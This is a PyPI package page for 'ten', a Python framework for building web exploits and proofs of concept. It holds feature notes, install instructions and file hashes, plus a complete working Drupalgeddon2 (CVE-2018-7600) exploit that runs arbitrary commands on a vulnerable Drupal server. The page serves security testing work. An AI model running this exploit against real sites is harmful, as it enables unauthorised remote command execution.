A (small) web exploit framework
Project description
ten
My (small) web exploit framework. I got tired of writing standard code over and over again, so I made this. Makes code more concise, clearer, faster to write. Might be useful to you.
It helps with HTTP interactions, handling user input, providing clear output, handling files, and running shell commands.
Useful to build POCs, and convert them into full, documented exploits in a blink.
Documentation
Documentation is available here: https://cfreal.github.io/ten/.
It includes tutorials, quickstart guides, and the Python documentation.
Installation
Ten is available on PyPi.
$ pip install ten
Features
- Input/output
- Arguments to the main function are automatically mapped to
argparse- They can hold a default value, get documented, etc.
- Output is clear and readable
- Arguments to the main function are automatically mapped to
- HTTP
- Improves the standard
requestsAPI - Parse HTTP responses easily (regex, CSS selectors, forms)
- Turn BURP on and off in a blink
- Concurrency
- Lots more.
- Improves the standard
- Data conversion
- Transform data: base64, hashing, query string, CSV, JSON, ...
- Available as a tool:
tf
- ...
Example
Functional, fully documented Drupalgeddon2 exploit:
#!/usr/bin/env python3
from ten import *
@entry
@arg("url", "URL of the Drupal website to exploit")
@arg("command", "Command to run on the server. Defaults to `id`")
def main(url, command="id"):
"""Exploit for Drupalgeddon2 (CVE-2018-7600)."""
session = ScopedSession(url)
response = session.post(
url,
params={
"q": "user/password",
"name[#post_render][]": "passthru",
"name[#markup]": command,
"name[#type]": "markup",
},
data={"form_id": "user_pass", "_triggering_element_name": "name"},
)
try:
form = response.form(id="user_pass")
except FormNotFoundError:
failure("Unable to find form in response")
build_id = form["form_build_id"]
response = session.post(
url,
params={
"q": f"file/ajax/name/#value/{build_id}"
},
data={"form_build_id": build_id},
)
result = response.re.search(r"^(.*)\[{", flags=re.S)
assume(result, "Unable to find command result in response")
msg_success("Exploit done")
msg_info("Command result:")
msg_print(result.group(1))
main()
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
Built Distribution
Filter files by name, interpreter, ABI, and platform.
If you're not sure about the file name format, learn more about wheel file names.
Copy a direct link to the current filters
File details
Details for the file ten-0.1.8.tar.gz.
File metadata
- Download URL: ten-0.1.8.tar.gz
- Upload date:
- Size: 45.8 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: poetry/1.4.2 CPython/3.10.9 Linux/5.15.0-164-generic
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
9f268e1448ac923fee2b874d3adb810b5a767f86cc415607885b602e52df8915
|
|
| MD5 |
9d9619cb1bb3f69c2ba2259bbca9453f
|
|
| BLAKE2b-256 |
989dfff4f0dbcfb2bf9619dc47c8b9b6b53b3ccf531d3167013a17ad86389968
|
File details
Details for the file ten-0.1.8-py3-none-any.whl.
File metadata
- Download URL: ten-0.1.8-py3-none-any.whl
- Upload date:
- Size: 54.7 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: poetry/1.4.2 CPython/3.10.9 Linux/5.15.0-164-generic
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
40b6709003d9a8221e1a53010f7cc8dd84560e227b5dfd1715dd60de1ff237d0
|
|
| MD5 |
a8a5b915661be7feec89757be60e3848
|
|
| BLAKE2b-256 |
a49dc51d1c83d2b4ff9288e1c97ae8608e2d9a4a7b6048ca924a8828501e09ca
|
